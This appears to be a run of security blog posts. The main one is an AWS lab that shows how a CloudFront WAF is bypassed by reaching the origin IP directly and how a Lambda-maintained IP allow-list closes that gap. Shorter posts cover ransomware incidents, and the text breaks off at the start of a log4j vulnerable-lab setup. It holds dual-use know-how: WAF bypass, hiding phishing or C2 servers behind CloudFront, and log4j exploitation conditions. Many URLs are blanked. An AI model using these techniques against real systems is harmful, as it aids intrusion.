One of the most common ways of bypassing a Web Application Firewall (WAF) involves finding the backend server’s address and connecting to it directly. An IP can be leaked in many ways: DNS history, HTTP headers, cookies, virtual host routing on shared infrastructure, stack traces leaking source code, successful server-side request forgery attacks, and sometimes even a JavaScript source map. Once you locate the IP, you can reach the server directly and bypass all the protections and logging that a WAF provides.

Very often during engagements, we assess web applications positioned behind AWS CloudFront, which by default is not a WAF but a Content Delivery Network (CDN) designed to speed up the loading time of a website by caching static files and delivering them quickly thanks to the many nodes CloudFront has all over the world. Even though CloudFront by default does not operate as a WAF, it does provide an intuitive way of adding WAF rules which can then be applied on each request passing through the service. More often than not, we see them being used. The rules can either be a managed subscription by a third-party vendor (e.g., F5) or they can be inline, written manually by the application owner.

As AWS does not provide a simple way for developers to limit requests to their web applications (EC2) to be coming only from CloudFront, people often improvise with different ways of enforcing the chain. For example, they use tokens: adding a custom HTTP header with a unique value which is sent with all requests from CloudFront and then verified on the web application server. While this is a strict control relying on a shared secret, there are security concerns with the secret leaking (e.g., when a header is reflected in the response), and it also adds significant complexity, as there must be an additional mechanism that can rotate the secret. Rotation involves changes to both AWS resources and application logic, not to mention the potential downtime if these actions are not fully synchronized.
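As a sketch of the shared-secret approach, the origin-side verification could look like the following. The header name and secret value here are hypothetical, not an AWS feature; CloudFront would simply be configured to attach this custom origin header to every forwarded request:

```python
import hmac

# Hypothetical shared secret -- in practice this is configured on the
# CloudFront distribution as a custom origin header value.
ORIGIN_SECRET = "5up3r-s3cr3t-value"

def is_from_cloudfront(headers: dict) -> bool:
    """Reject any request that does not carry the expected token header."""
    supplied = headers.get("X-Origin-Token", "")
    # Constant-time comparison avoids leaking the secret via timing
    return hmac.compare_digest(supplied, ORIGIN_SECRET)

print(is_from_cloudfront({"X-Origin-Token": "5up3r-s3cr3t-value"}))  # True
print(is_from_cloudfront({}))                                        # False
```

Note that this sketch is exactly where the rotation problem described above bites: the constant must be changed in two places (CloudFront and the origin) at the same time.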

A lesser-known technique that AWS has suggested over the years is to restrict access based on IP address. While this sounds very much like Cloudflare’s default recommendation, with CloudFront things are a bit more complicated: AWS does not keep a fixed address pool for the service, but rather rotates IP addresses frequently. This means that if you don’t update the firewall immediately when a change occurs, you risk both downtime, as new requests could be coming from a non-approved IP address, and attacks from servers/services that now hold an IP address previously associated with CloudFront.

In this article we will build a lab in which we will 1) create a simple application behind CloudFront, 2) place some WAF rules and demonstrate the weakness, and 3) configure an IP-based restriction that should protect the end system.

Setting up the Environment

For this example, we can create a simple web server in AWS with a public and a private page which we will then try to protect with WAF rules on CloudFront.

Creating the Web Server

The first thing we need to do is create a security group with an inbound “allow all” rule for port 80:

$ aws ec2 create-security-group \
	--group-name ExampleWebsite \
	--description "Example Website for testing CloudFront with WAF rules"
    "GroupId": "sg-0de46ea030c72802c"
$ aws ec2 authorize-security-group-ingress \
	--group-id sg-0de46ea030c72802c \
	--protocol tcp --port 80 --cidr

Next, optionally, we can quickly create an SSH key to use for the new system:

$ aws ec2 create-key-pair \
	--key-name MyKeyPair \
	--query 'KeyMaterial' \
	--output text > MyKeyPair.pem

Finally, we will need a simple bash script to run at build time on the web server:

#!/bin/bash
yum update -y
yum install -y httpd.x86_64
systemctl start httpd.service
echo "This is a public page" > /var/www/html/index.html
echo "secret" > /var/www/html/private.html

With these prerequisites out of the way, it is now time to build the web server:

$ aws ec2 run-instances \
	--image-id ami-0ad97c80f2dfe623b \
	--instance-type t2.nano \
	--user-data file:// \
	--security-group-ids sg-0de46ea030c72802c \
	--key-name MyKeyPair
    "Groups": [],
    "Instances": [{
        "AmiLaunchIndex": 0,
        "ImageId": "ami-0ad97c80f2dfe623b",
        "InstanceId": "i-0af0b1290214d5d95",

A couple of minutes later, it is possible to get the public IP of the system with the following command:

$ aws ec2 describe-instances \
	--instance-ids i-0af0b1290214d5d95 \
	--query 'Reservations[*].Instances[*].PublicIpAddress' \
	--output text

Now it is time to check the environment; we can quickly see that the server is up and the pages are there:

$ curl
This is a public page
$ curl

Setting up Route 53

To set up CloudFront, we will first need to create a DNS record for the web server. We already have a hosted zone configured in the AWS account which we can use, as shown below:

$ aws route53 list-hosted-zones
    "HostedZones": [{
        "Id": "/hostedzone/Z0520503IHM7MMFXXXXX",
        "Name": "",

To create an A record mapping to the EC2 system, we will need the following create-record.json file:

{
  "Comment": "Testing creating a record set",
  "Changes": [{
      "Action": "CREATE",
      "ResourceRecordSet": {
        "Name": "",
        "Type": "A",
        "TTL": 300,
        "ResourceRecords": [{
            "Value": ""
        }]
      }
  }]
}

Now it is just a matter of making the request to Route 53, as shown below:

$ aws route53 change-resource-record-sets \
	--hosted-zone-id "/hostedzone/Z0520503IHM7MMFXXXXX" \
	--change-batch file://create-record.json

A couple of seconds later you can check that the record is active:

$ aws route53 get-change --id C018062338JPC4J7GN2I9
    "ChangeInfo": {
        "Id": "/change/C018062338JPC4J7GN2I9",
        "Status": "INSYNC",
        "SubmittedAt": "2023-04-07T00:50:12.606000+00:00",
        "Comment": "Testing creating a record set"

And we can confirm that the site is still accessible:

$ curl
This is a public page
$ curl

Setting up CloudFront

The next step is to finally create the CloudFront distribution routing traffic to our website. To make the request to AWS we will need the following distribution.json file:

{
  "CallerReference": "cf-cli-distribution",
  "Comment": "Example Cloudfront Distribution",
  "Origins": {
    "Quantity": 1,
    "Items": [
      {
        "Id": "",
        "DomainName": "",
        "CustomOriginConfig": {
          "HTTPPort": 80,
          "HTTPSPort": 443,
          "OriginProtocolPolicy": "http-only",
          "OriginSslProtocols": {
            "Quantity": 1,
            "Items": [""]
          }
        }
      }
    ]
  },
  "DefaultCacheBehavior": {
    "TargetOriginId": "",
    "ViewerProtocolPolicy": "redirect-to-https",
    "AllowedMethods": {
      "Quantity": 2,
      "Items": ["", ""],
      "CachedMethods": {
        "Quantity": 2,
        "Items": ["", ""]
      }
    },
    "CachePolicyId": "4135ea2d-6df8-44a3-9df3-4b5a84be39ad"
  },
  "Enabled": true
}

And the final command to create it looks as follows:

$ aws cloudfront create-distribution --distribution-config file://distribution.json
    "Location": "",
    "ETag": "E1Y4BASGKG03MO",
    "Distribution": {
        "Id": "E3OSJ4978QOTZ2",
        "ARN": "arn:aws:cloudfront::9536171XXXXX:distribution/E3OSJ4978QOTZ2",
        "Status": "InProgress",
        "LastModifiedTime": "2023-04-07T01:29:11.959000+00:00",
        "InProgressInvalidationBatches": 0,
        "DomainName": "",

A couple of minutes later we can go ahead and check the connection to the site:

$ curl -L
This is a public page
$ curl -L

Adding a WAF Rule to CloudFront

The next task for us is to create a WAF rule which we can use to protect everything going to /private*. The following waf-rule.json file was created for this purpose (note that L3ByaXZhdGU= is /private):

[
  {
    "Name": "basic-rule",
    "Priority": 0,
    "Statement": {
      "ByteMatchStatement": {
        "SearchString": "L3ByaXZhdGU=",
        "FieldToMatch": {
          "UriPath": {}
        },
        "TextTransformations": [
          {
            "Priority": 0,
            "Type": "NORMALIZE_PATH"
          }
        ],
        "PositionalConstraint": "STARTS_WITH"
      }
    },
    "Action": {
      "Block": {}
    },
    "VisibilityConfig": {
      "SampledRequestsEnabled": true,
      "CloudWatchMetricsEnabled": true,
      "MetricName": "basic-rule"
    }
  }
]

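The base64 claim in the rule is easy to verify for yourself, since WAFv2 expects SearchString to be base64-encoded:

```python
import base64

# Confirm the SearchString in the WAF rule really is the /private path prefix
encoded = base64.b64encode(b"/private").decode()
print(encoded)  # L3ByaXZhdGU=
```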
Time to create the rule, where you will notice it is specifically created for CloudFront in the us-east-1 region, even though our EC2 instance is in eu-west-2. This is because CloudFront is a global service whose WAF resources must be created in us-east-1, while the EC2 origin has no such restriction: CloudFront reaches it over its public address, so the instance can live in any region.

$ aws wafv2 create-web-acl \
    --name TestWebAcl \
    --scope CLOUDFRONT \
    --default-action Allow={} \
    --visibility-config SampledRequestsEnabled=true,CloudWatchMetricsEnabled=true,MetricName=TestWebAclMetrics \
    --rules file://waf-rule.json \
    --region us-east-1
    "Summary": {
        "Name": "TestWebAcl",
        "Id": "74941941-24b9-4b1e-b0c0-276a653aad85",
        "Description": "",
        "LockToken": "ba596cac-bdc8-490f-af7c-1f4734c720f3",
        "ARN": "arn:aws:wafv2:us-east-1:9536171XXXXX:global/webacl/TestWebAcl/74941941-24b9-4b1e-b0c0-276a653aad85"

While the intuitive step at this moment would be to use aws wafv2 associate-web-acl, this would not work: applying WAF rules to CloudFront requires updating the distribution configuration rather than simply associating the rule. To make things even harder, AWS does not allow you to send an update containing only the particular values you want to change; instead, you need to download the full configuration, patch it, and submit it again.

To download the configuration file we can use the following command:

$ aws cloudfront get-distribution-config \
	--id E3OSJ4978QOTZ2 \
	--query "DistributionConfig" \
	--output json > current-distribution.json

Next we can patch the WebACLId value to list the rule we want to be applied:

sed '/WebACLId/c\"WebACLId\":\"arn:aws:wafv2:us-east-1:9536171XXXXX:global/webacl/TestWebAcl/74941941-24b9-4b1e-b0c0-276a653aad85\",' current-distribution.json > updated-distribution.json
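If the sed quoting looks fragile, the same patch can be done with Python’s json module. This is a sketch, not part of the original workflow; the ARN is the one returned by create-web-acl above:

```python
import json

# Parse the saved distribution config, overwrite WebACLId, serialise it back
WEB_ACL_ARN = ("arn:aws:wafv2:us-east-1:9536171XXXXX:global/webacl/"
               "TestWebAcl/74941941-24b9-4b1e-b0c0-276a653aad85")

def patch_web_acl(config_text: str, arn: str) -> str:
    config = json.loads(config_text)
    config["WebACLId"] = arn
    return json.dumps(config, indent=2)

# Usage against the files from the surrounding commands:
# with open("current-distribution.json") as f:
#     patched = patch_web_acl(, WEB_ACL_ARN)
# with open("updated-distribution.json", "w") as f:
#     f.write(patched)
```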

Finally, we can make the update request, where you will notice we are passing not only the DistributionId but also the ETag we received when we created the distribution.

$ aws cloudfront update-distribution \
	--id E3OSJ4978QOTZ2 \
	--distribution-config file://updated-distribution.json \
	--if-match E1Y4BASGKG03MO
    "ETag": "E2JUPVIBC3V15H",
    "Distribution": {
        "Id": "E3OSJ4978QOTZ2",
        "ARN": "arn:aws:cloudfront::9536171XXXXX:distribution/E3OSJ4978QOTZ2",
        "Status": "InProgress",
        "LastModifiedTime": "2023-04-07T02:26:50.622000+00:00",
        "InProgressInvalidationBatches": 0,
        "DomainName": "",

To make sure the rule is applied we can check the access to the pages:

$ curl
This is a public page
$ curl 
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "">
<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<TITLE>ERROR: The request could not be satisfied</TITLE>
<H1>403 ERROR</H1>
<H2>The request could not be satisfied.</H2>
<HR noshade size="1px">
Request blocked.
We can't connect to the server for this app or website at this time. There might be too much traffic or a configuration error. Try again later, or contact the app or website owner.
<BR clear="all">
If you provide content to customers through CloudFront, you can find steps to troubleshoot and help prevent this error by reviewing the CloudFront documentation.
<BR clear="all">
<HR noshade size="1px">
Generated by cloudfront (CloudFront)
Request ID: QGJDmdNqJJ6_zS3ALUczF-8NrM-HDKqTzNu-CZoppz6bi3nWv_cSIw==

Strengthening the Environment

At this point, you would be right to notice that direct requests to the EC2 instance’s public IP address would still succeed, because the WAF would not be applied: the traffic would not pass through CloudFront but go straight to the server.

Creating a Custom Lambda

To handle this, we can follow the recommendation from AWS and create our own Lambda function that pulls the latest list of IP addresses associated with CloudFront and updates the rules on the security group attached to our web server. In effect that would prevent unauthorized traffic and enforce a chain.

The Lambda will need to have the following lambda_function.py file:

import os
import json
import boto3
import urllib.request
import hashlib

INGRESS_PORTS    = [80] # but may as well be [80, 443] or just [443]
VPC_ID           = 'vpc-032a791ded3139c0b' # change me
SECURITYGROUP_ID = 'sg-0de46ea030c72802c'  # change me
REGION           = 'eu-west-2'             # change me

ec2_client = boto3.client('ec2', region_name=REGION)
ec2_resource = boto3.resource('ec2', region_name=REGION)

def lambda_handler(event, context):
    # SNS message notification event when the ip ranges document is rotated
    message = json.loads(event['Records'][0]['Sns']['Message'])
    response = urllib.request.urlopen(message['url'])
    ip_ranges = json.loads(response.read())

    # Collect every CIDR range currently assigned to CloudFront
    cf_ranges = []
    for prefix in ip_ranges['prefixes']:
        if prefix['service'] == 'CLOUDFRONT':
            cf_ranges.append(prefix['ip_prefix'])

    rangeToUpdate = ec2_client.describe_security_groups(
        GroupIds = [ SECURITYGROUP_ID ]
    )
    for sg in rangeToUpdate['SecurityGroups']:
        sgo = ec2_resource.SecurityGroup(sg['GroupId'])
        # Remove the stale rules before re-adding the fresh ranges
        if len(sgo.ip_permissions) > 0:
            sgo.revoke_ingress(IpPermissions=sgo.ip_permissions)
        for each_proto in INGRESS_PORTS:
            add_params = {
                'ToPort': int(each_proto),
                'FromPort': int(each_proto),
                'IpRanges': [{ 'CidrIp': range } for range in cf_ranges],
                'IpProtocol': 'tcp'
            }
            sgo.authorize_ingress(**add_params)

But before we can go ahead and create the Lambda function, we will need to 1) create a policy with the necessary permissions, and 2) create a role to which we can attach the policy.

Starting with the IAM policy, we will need the following lambdarole.json file:

Disclaimer: It is recommended to break down the policy into smaller statements and be specific about which resources it should apply to. This is a simple proof-of-concept.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "CloudWatchPermissions",
      "Effect": "Allow",
      "Action": [
        "logs:CreateLogGroup",
        "logs:CreateLogStream",
        "logs:PutLogEvents"
      ],
      "Resource": "arn:aws:logs:*:*:*"
    },
    {
      "Sid": "EC2Permissions",
      "Effect": "Allow",
      "Action": [
        "ec2:DescribeSecurityGroups",
        "ec2:AuthorizeSecurityGroupIngress",
        "ec2:RevokeSecurityGroupIngress"
      ],
      "Resource": "arn:aws:ec2:*:*:*"
    }
  ]
}

The policy creation can be done with the following command:

$ aws iam create-policy \
	--policy-name LambdaPolicy \
	--policy-document file://lambdarole.json
    "Policy": {
        "PolicyName": "LambdaPolicy",
        "PolicyId": "ANPA54CACFZZNFOYOE5ZW",
        "Arn": "arn:aws:iam::9536171XXXXX:policy/LambdaPolicy",

Next, we will need to create a Lambda-based IAM role and then attach to it the policy we just created. For the role we will need the following basepolicy.json file:

{
  "Version": "2012-10-17",
  "Statement": {
    "Effect": "Allow",
    "Principal": {
      "Service": "lambda.amazonaws.com"
    },
    "Action": "sts:AssumeRole"
  }
}

The commands needed to create the role and attach the policy look as follows:

$ aws iam create-role \
	--role-name LambdaExecutionRole \
	--assume-role-policy-document file://basepolicy.json
    "Role": {
        "Path": "/",
        "RoleName": "LambdaExecutionRole",
        "RoleId": "AROA54CACFZZMTBSYMFCL",
        "Arn": "arn:aws:iam::9536171XXXXX:role/LambdaExecutionRole",
$ aws iam attach-role-policy \
	--role-name LambdaExecutionRole \
	--policy-arn "arn:aws:iam::9536171XXXXX:policy/LambdaPolicy"

Finally, we can archive the Lambda function we wrote and upload it to AWS:

$ zip
$ aws lambda create-function \
	--function-name UpdatingSGForCloudFront \
	--runtime python3.9 \
	--zip-file fileb:// \
	--handler lambda_function.lambda_handler \
	--role arn:aws:iam::9536171XXXXX:role/LambdaExecutionRole \
	--region eu-west-2
    "FunctionName": "UpdatingSGForCloudFront",
    "FunctionArn": "arn:aws:lambda:eu-west-2:9536171XXXXX:function:UpdatingSGForCloudFront",

Testing the Lambda Function

Before we can test the Lambda function, it is important to note that on average there are around 145 IP ranges associated with CloudFront, and because each one must be listed as a separate rule in the security group, we will hit the default AWS quota for inbound or outbound rules per security group. So, before we move forward, it is important to increase our quota with the following command:

$ aws service-quotas request-service-quota-increase \
    --service-code vpc \
    --quota-code L-0EA8095F \
    --desired-value 160
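
The rule count driving this quota can be estimated directly from the ip-ranges document: each CloudFront prefix becomes one security-group rule, so the quota must exceed the prefix count. A sketch (the structure mirrors AWS’s ip-ranges.json; the two entries are illustrative only):

```python
# Count how many security-group rules the Lambda would create.
# Sample data only -- the live document is fetched from AWS.
ip_ranges = {
    "prefixes": [
        {"ip_prefix": "", "service": "CLOUDFRONT"},
        {"ip_prefix": "", "service": "EC2"},
    ]
}

needed_rules = sum(1 for p in ip_ranges["prefixes"]
                   if p["service"] == "CLOUDFRONT")
print(needed_rules)  # 1 for this sample; roughly 145 against the live document
```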

Keep in mind that the previous command could take an hour (or even more) to take effect. Once ready, we can use test input (file lambdatestinput.json) to run the function and see how it behaves. You will notice that this input is shaped like an SNS event message, which is intentional: AWS has a public SNS topic used to notify subscribers whenever its published IP ranges change. At the very end of our setup we will subscribe to it, but for now we will use it as test input:

{
  "Records": [
    {
      "EventVersion": "1.0",
      "EventSubscriptionArn": "arn:aws:sns:EXAMPLE",
      "EventSource": "aws:sns",
      "Sns": {
        "SignatureVersion": "1",
        "Timestamp": "1970-01-01T00:00:00.000Z",
        "Signature": "EXAMPLE",
        "SigningCertUrl": "EXAMPLE",
        "MessageId": "95df01b4-ee98-5cb9-9903-4c221d41eb5e",
        "Message": "{\"create-time\": \"yyyy-mm-ddThh:mm:ss+00:00\", \"synctoken\": \"0123456789\", \"md5\": \"7fd59f5c7f5cf643036cbd4443ad3e4b\", \"url\": \"\"}",
        "Type": "Notification",
        "UnsubscribeUrl": "EXAMPLE",
        "TopicArn": "arn:aws:sns:EXAMPLE",
        "Subject": "TestInvoke"
      }
    }
  ]
}

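One detail worth highlighting in this event: the ip-ranges URL arrives as a JSON string nested inside the SNS envelope, so it has to be decoded twice, once for the event and once for the Message field. This mirrors the first lines of lambda_handler shown earlier:

```python
import json

# The Message field is itself a JSON document serialised into a string
sns_message = ("{\"create-time\": \"yyyy-mm-ddThh:mm:ss+00:00\", "
               "\"synctoken\": \"0123456789\", "
               "\"md5\": \"7fd59f5c7f5cf643036cbd4443ad3e4b\", "
               "\"url\": \"\"}")

message = json.loads(sns_message)
print(message["synctoken"])  # 0123456789
```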
To invoke the Lambda function with the test input we can use the following command:

$ aws lambda invoke \
	--function-name UpdatingSGForCloudFront \
	--payload fileb://lambdatestinput.json \
	outputfile.txt
    "StatusCode": 200,
    "ExecutedVersion": "$LATEST"
$ cat outputfile.txt 

And to verify that indeed the rules have been created, we can check how many rules our security group now has:

$ aws ec2 describe-security-group-rules \
	--filter Name="group-id",Values="sg-0de46ea030c72802c" | \
	jq -r '.SecurityGroupRules | length'

The final check is to confirm that we can’t reach the EC2 instance directly:

$ curl --connect-timeout 2
curl: (28) Failed to connect to port 80 after 2001 ms: Timeout was reached

Subscribing to the Relevant SNS Topic

To ensure resilience and constant synchronization with changes to CloudFront’s IP address space, we can subscribe our Lambda function to the public AmazonIpSpaceChanged SNS topic, after which no further manual action is needed.

$ aws sns subscribe \
	--topic-arn "arn:aws:sns:us-east-1:806199016981:AmazonIpSpaceChanged" \
	--region us-east-1 \
	--protocol lambda \
	--notification-endpoint "arn:aws:lambda:eu-west-2:9536171XXXXX:function:UpdatingSGForCloudFront"
$ aws lambda add-permission \
	--function-name "arn:aws:lambda:eu-west-2:9536171XXXXX:function:UpdatingSGForCloudFront" \
	--statement-id lambda-sns-trigger \
	--region eu-west-2 \
	--action lambda:InvokeFunction \
	--principal sns.amazonaws.com \
	--source-arn "arn:aws:sns:us-east-1:806199016981:AmazonIpSpaceChanged"


In this article, we demonstrated how we can create a strict firewall that only allows traffic to an EC2 instance from CloudFront and would avoid the risk of an attacker discovering the web server’s public IP address and reaching it directly. We also implemented an automated script that can immediately update the IP addresses in the firewall and keep them up to date.

Naturally, the technique used in this blog could be applied in many different ways:

  • The document referenced in the SNS body lists the IP address ranges of all AWS services, so it could also be useful if you want to restrict access based on a different service, such as ELB, Lambda, etc.
  • The concept of hiding an EC2 instance behind an AWS service has many offensive use cases. For example, hiding phishing infrastructure or C2 infrastructure from being publicly exposed.

Hopefully, this article can help you better attack and defend systems behind CloudFront.

The article was written by @saldat0

The mechanics of remote work are not as black and white as most people realise. Of course, amidst the pandemic crisis, many companies have undertaken a significant transformation and embraced increased working-from-home (WFH). While there are positives associated with this, such as working hours flexibility, reduced stress levels and improved work-life balance, it has also led to the creation of a wave of new cybersecurity threats.

Analysis shows that remote staff are at an even higher risk than employees working from the office. As a result of unmonitored (and often less secure) home networks, the practice of using personal, non-managed devices for accessing business resources, and the lack of physical security that one could normally expect in an office building, cybercriminals now have an even larger attack surface that they can utilise when attempting to compromise an organisation.


Although the cyber threat landscape is in constant movement, ransomware and phishing campaigns have continued to be the predominant risks for organisations. With increased attack surfaces and the limited oversight that corporations have over their remote workers, it is increasingly difficult for organisations to protect themselves.

At the start of the global workforce shift, many remote employees were less familiar with how phishing campaigns can lead to the compromise of entire corporations. And it shouldn’t come as a surprise that there continue to be employees with a high propensity to interact with phishing emails.

Security Products

Contrary to common perception, cybersecurity improvements do not necessarily hinder productivity standards. Instead, some solutions can be an almost transparent step in an otherwise simple process. For example, Single Sign-On authentication combined with Two-Factor authentication can serve a critical role for an organisation’s security by creating a strong layer of protection and ensuring thorough access control, all without intruding into the usability.

With that in mind, it is crucial for organisations to understand that cyber threats are an ongoing challenge requiring constant attention, with no one-time solution or single piece of software that fits all situations.

Awareness & Training

It may seem obvious, but more companies need to prioritise workshops and training sessions, as they continue to be the best way to address cybersecurity risks and ensure employees working from home understand the cause and effect of various attacks.

Training employees to identify a phishing email is crucial. Fortunately, in 2021 more and more organisations are investing in integrated and robust security solutions.  These often specialise in detection, prevention, and even mitigation of ransomware and other cybersecurity threats. 


As cybercrime continues to evolve, it is pertinent for organisations and their staff to establish a culture of understanding and respecting fundamental cybersecurity issues. For instance, employees should be able to run basic security health checks on their personal devices and it should become a new standard for companies that intend to continue the WFH model. 

There are more than enough software solutions, tools, and strategies available for companies to improve their security posture and help them adapt. Setting basic security parameters and goals is the right step for organisations to improve their security status against common cybersecurity threats.

In January 2021, a major attack on Microsoft Exchange, the company’s business email server, took place. By March, the attack had spiralled out of control and become a global cybersecurity issue in which threat actors managed to infect thousands of companies.

First Report and Condemnation of the Cyber Attack

Volexity first reported that attackers were actively exploiting a vulnerability in the Microsoft Exchange email server on January 6th. Unfortunately, this was when the US Capitol riot became the focus of the media, diverting attention away from the major finding. The Biden administration has since openly claimed Chinese involvement in the Exchange hack that compromised thousands of computer systems.

Following this statement, Microsoft affirmed that the alleged Chinese cyberattack has had many victims throughout the world, with most affected being small and medium-sized businesses.

The Impact on Organizations

The aggressive cyberattack stole emails from over 30,000 servers in the U.S. According to Bloomberg, however, the real number of affected businesses could be as high as 60,000. The alleged Chinese espionage hacking group successfully exploited four flaws in Exchange, which gave them full Remote Code Execution (RCE) on the affected systems.

Hafnium, the Chinese hacking group believed to be behind the attack, used a web of Virtual Private Servers in the U.S. to conceal its original location. In the past, the group has targeted businesses, defence contractors, researchers, and non-profit organizations.

Extent of Exploitation

The Microsoft Exchange hack is similar in scale to the WannaCry ransomware attack of 2017. Microsoft highlights that DearCry/DoejoCrypt, a ransomware variant, exploits the same bugs to deploy ransomware on vulnerable Exchange servers.

Technically, the deployment of China Chopper web shells on compromised Exchange servers has become a common attack strategy; once a batch file is successfully written to an infected server, hackers gain access to the vulnerable system.

Microsoft notes that the batch file performs a backup of the SAM (Security Account Manager) database. Once they obtain the security registry hives, hackers can access the passwords of system users held in the registry’s Local Security Authority portion, in turn allowing them to connect to the organisation while impersonating a valid user.

Released Patches

In April, Microsoft finally rolled out its official security updates for business products. Since then, however, there have been many unscheduled releases to fix Exchange bugs, which Microsoft treats as serious issues. In its April update, Microsoft tackled 114 CVEs, of which 19 were critical; specifically, CVE-2021-28481 and CVE-2021-28480 were the two RCE vulnerabilities that the NSA reported.

Throughout the cybersecurity crisis, Microsoft collaborated with CISA (Cybersecurity & Infrastructure Security Agency), security companies, and other U.S. agencies to guide businesses on how to minimise the impact of the Exchange hack.

Final Thoughts

Although officials profess that the cybersecurity crisis is serious, businesses can still mitigate the damage through fixable patches. The silver lining is that Microsoft assures businesses that its cloud email system is not affected.

Almost half of all U.S. fuel is transported by the Colonial Pipeline, which was the victim of a ransomware attack and forced to cease operation on 8 May, once again spreading tension among businesses that see increasingly frequent attacks.

The Colonial Pipeline announced its breach on 7 May and has since commenced an internal investigation into the impact and the cause of this incident.

What Happened?

As part of a double extortion scheme, hackers stole approximately 100 GB of sensitive data on 6 May, after which they threatened to publish this online. According to Bloomberg, the company proactively shut down certain systems to contain the threat, resulting in a temporary halt to pipeline operations and additional system issues.

Joe Blount, the CEO of Colonial Pipeline, stated on 8 June that he had paid the hackers a ransom of $4.4 million a day after discovering malware on the company’s systems. To negotiate with the hackers, the company hired outside consultants who made the payment in bitcoin. Shortly following the testimony, the FBI announced it had recovered $2.3 million from the Darkside ransomware group.

Colonial Pipeline reported on 10 May that the remediation process was ongoing and that each system was being restored incrementally.

Vulnerability Disclosure & How Hackers Exploited It

To this day, it is still unclear how the hackers got access to the internal infrastructure and what the initial attack vectors were. Possibilities include an older, unpatched vulnerability in the system, a phishing email that enticed an employee within the company, or the discovery and use of valid user credentials by the hackers. None of these have yet been confirmed.

It should be noted that Darkside targeted the business activities rather than operational systems, suggesting their intention was not just to bring down the pipeline but to make a financial profit by targeting much more sensitive data.

Known as a ransomware-as-a-service (RaaS), Darkside is said to have leaked data related to at least 91 organisations since it began operations in 2020. Partner organisations are recruited to expand the criminal enterprise by infiltrating corporate networks and spreading ransomware, while the core developers are responsible for maintaining malware and payment systems.

Darkside uses very stealthy methods that are difficult to track; hence, no definite attack vector has been found to prove the pathway used to target the Colonial Pipeline.

Who was affected?

The attack caused serious damage to the company, but the most affected ones are the consumers. As a result of supply shortage concerns, gasoline futures reached their highest level in three years at the time of the attack. There has been an increase in demand, but drivers are advised not to panic-buy since this could cause prices to rise even further.

Colonial Pipeline was forced to manage additional lateral supply manually with road-driven oil tankers, prioritising areas that had no fuel delivery service or were experiencing severe shortages.


The Colonial Pipeline ransomware attack was carried out by a hacking group named Darkside, who used an unknown initial attack vector to install and spread ransomware within the organisation. The CEO of Colonial Pipeline secretly paid the ransom, but the FBI later recovered part of the money.

One of the burgeoning threats within the IT industry in the UK is ransomware. These attacks have been affecting numerous organisations and businesses in the UK for several years, with significant increases in frequency during the COVID-19 pandemic.

Ransomware is a type of malicious software used by cybercriminals to encrypt files and documents within a computer system, turning them into unreadable data. As a result, the admins and owners of the files can no longer access their information. The cybercriminals then demand ransom money from the victims to restore access.

Latest Ransomware Attacks faced by the UK

Analysing the statistics provided by the UK Department for Digital, Culture, Media, and Sport, 8% of UK organisations and businesses have encountered ransomware attacks during the past 12 months.

One of the most recent attacks was against the ticket machines of the UK government-run train operator, Northern Trains, where an attack was carried out against more than 600 servers operating the digital ticket self-service counters. While the systems were made unresponsive, forcing the operators to turn them off, customer and payment data were not compromised as a result of this attack.

Furthermore, the National Cyber Security Centre (NCSC) has identified an increase in the number of ransomware attacks against education institutions such as schools, colleges, and universities in the UK. The concerning trend was observed during August and September 2020, and then again in February 2021. The effects have included loss and destruction of students’ coursework, school financial documents, and other sensitive information. Newcastle University in the UK faced a serious ransomware attack that disrupted its systems; after the cybercriminals successfully stole sensitive data, they published 750Kb of it and offered it for sale on their website as proof. Similarly, a ransomware attack on South and City College in Birmingham deactivated most of its central systems, causing widespread disruption.

Very recently, Furniture Village, the largest independent furniture retailer in the UK, was hit by ransomware. The attack caused serious distress for its customers. The company took the affected systems offline in an attempt to limit the scope of the attack and stated that there was no evidence that the private data of its customers or employees had been compromised.

The Reasons Behind Ransomware Attacks in the UK

Due to the increase in remote working during the COVID-19 pandemic, phishing emails have remained one of the most common ways of delivering ransomware payloads to computer systems. In addition, cybercriminals target organisations via Remote Desktop Protocol (RDP) and virtual private networks (VPNs), which are sometimes protected by weak passwords and rarely enforce multi-factor authentication (MFA). There have also been cases linked to unpatched vulnerabilities in internet-exposed software.

Most commonly, cybercriminals send ransomware via a phishing email, which entices victims to open a malicious file or click on a link to a website that eventually downloads malware on their computer. Attackers can sometimes discover valid user credentials via public credential dumps or by harvesting credentials from phishing attacks (asking the users to enter their credentials in a fake portal under a convincing pretext). In addition, brute force, or more precisely password spraying attacks, can also be used to identify user credentials due to weak password policies. 

RDP misconfigurations and VPN vulnerabilities have also opened the pathway for cybercriminals to attack computer systems remotely, without targeting users. Since 2019, numerous weaknesses have been found in VPN appliances such as Citrix, Fortinet, Pulse Secure, and Palo Alto. Ransomware actors have used these weaknesses to obtain initial access to internal computer systems within the organization.

To secure computer systems against ransomware attacks, it is important to ensure that an up-to-date antivirus or Endpoint Detection and Response (EDR) product is installed. Victims of ransomware attacks can either pay the ransom, attempt to decrypt their data themselves, or remove the affected computer systems from the network in the hope that the ransomware has not propagated.

Given how common ransomware attacks have become, the best practice for UK organisations is to follow the NCSC’s mitigating malware and ransomware guidance, which will help them protect their computer systems against such attacks.

With its widespread adoption and the difficulty enterprises face in tracking down where it is used, log4j will likely remain a relevant attack vector for a long time. Because of this, we decided to showcase how to build a local lab that can be used both for developing and testing an exploit, and for confirming and adapting remedial actions.

For background, whenever we refer to the Apache log4j vulnerability, we mean the following CVEs:

1. Building the Vulnerable Server

This vulnerability involves many conditions and elements that significantly influence both its impact and the possible remediation steps. We found that, to obtain realistic results that can confidently be relied on, we had to be very precise when setting up the environment. For example, the JDK version, the log4j version, the operating system, the running DNS resolver services, the log4j configuration file, the Java configuration file, the environment variables, and the other libraries included in the application can all make the exploitation and patching of this issue slightly different.

Because of this, it is important to make sure that all the software matches that of the target application. To that end, in this article we pay particular attention not only to the version of log4j but also to the version of Java, as it plays an important role in the exploit.

We will cover three different ways of building a vulnerable server:

Docker Container

Start right away with Docker, which is by far the easiest to set up. OpenJDK (an open-source implementation of the Java Platform, Standard Edition) offers all the versions of Java that you may need, ready to be downloaded and used.

Keep in mind that JDK versions greater than 6u211, 7u201, 8u191, and 11.0.1 are not affected by the LDAP attack vector. In these versions, com.sun.jndi.ldap.object.trustURLCodebase is set to false, meaning JNDI cannot load remote code using LDAP. However, the vulnerability is still exploitable using other methods, such as beanfactory.
